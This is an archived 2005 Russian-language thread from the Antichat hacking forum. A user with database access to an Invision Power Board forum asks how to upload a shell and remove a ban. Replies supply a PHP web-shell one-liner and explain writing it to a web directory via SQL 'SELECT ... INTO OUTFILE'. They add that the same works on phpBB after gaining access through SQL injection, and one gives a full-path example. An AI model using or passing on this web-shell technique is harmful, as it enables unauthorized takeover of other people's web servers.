Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Заливка шелла и снятие бана в ipb через mysql |
24.11.2005, 20:05
|
|
Новичок
Регистрация: 19.11.2005
Сообщений: 8
Провел на форуме:
19830
Репутация:
0
|
|
Заливка шелла и снятие бана в ipb через mysql
Есть доступ к базе ... Возможно ли как нить залить шелл через неё ? И что нужно редактить в этой базе стобы снять бан ? Я тут попытался но у меня что то не особо получилось ... Кстати форум Ipb стоит .
|
|
|
24.11.2005, 20:30
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
Сначала заносим в БД запись нашего шела типа
<? system($_GET(cmd)) ?>
Потом сохраняем в файл
SELECT blabla INTO OUTFILE 'shell.php' FROM TABLE_NAME
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
24.11.2005, 21:23
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862
Репутация:
54
|
|
А на phpbb можно таким способом заливать шелл?
|
|
|
|
24.11.2005, 21:39
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
ну пхпББ тоже на БД работает соответсвтенно можно=)
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
24.11.2005, 21:56
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862
Репутация:
54
|
|
И это будет работатьь на любых версиях?
|
|
|
|
24.11.2005, 22:02
|
|
Новичок
Регистрация: 24.11.2005
Сообщений: 18
Провел на форуме:
55564
Репутация:
0
|
|
Сообщение от madnet
Сначала заносим в БД запись нашего шела типа
<? system($_GET(cmd)) ?>
Потом сохраняем в файл
SELECT blabla INTO OUTFILE 'shell.php' FROM TABLE_NAME
Обьясни плиз немного подробнее
|
|
|
|
24.11.2005, 22:09
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
Обьясни плиз немного подробнее
находишь СКУЛЬ иньекцию..или пробиваешься и достаешь доступ к базе.. и делаешь запрос с помощью которого добавляешь юзера(или еще чего то в базу) с содержанием <? system($_GET['cmd']; ?> а дальше по команде маднета
надеюсь понятно??
Ван, ну наверно))ведь во всех версиях есть коннект к БД =))
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
24.11.2005, 22:13
|
|
Новичок
Регистрация: 24.11.2005
Сообщений: 18
Провел на форуме:
55564
Репутация:
0
|
|
Сообщение от m0nzt3r
находишь СКУЛЬ иньекцию..или пробиваешься и достаешь доступ к базе..
Доступ есть... Но вот дальше не понял. Если можно, то подробней плиз. 
|
|
|
|
24.11.2005, 22:37
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
Подробней - выучи команды SQL.
Insert, select хотя бы. C помощью команды insert добавь юзера.
|
|
|
|
24.11.2005, 23:53
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446
Репутация:
182
|
|
2 ВанПрошу не флудить и по-возможности не задавать однотипные а также глупые вопросы.Так же не писать по одному вопросу в сообщении,если захотел что то добавить(незначительное) то есть кнопочка редактирования сообщения.
Все выше перечисленное относится и к другим пользователям.
Настчет темы добавлю к сообщению madnet'a
SELECT `my_column` INTO OUTFILE '/path2/wwwdir/shell.php' FROM TABLE_NAME
Подчеркнутым- полный путь к файлу.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
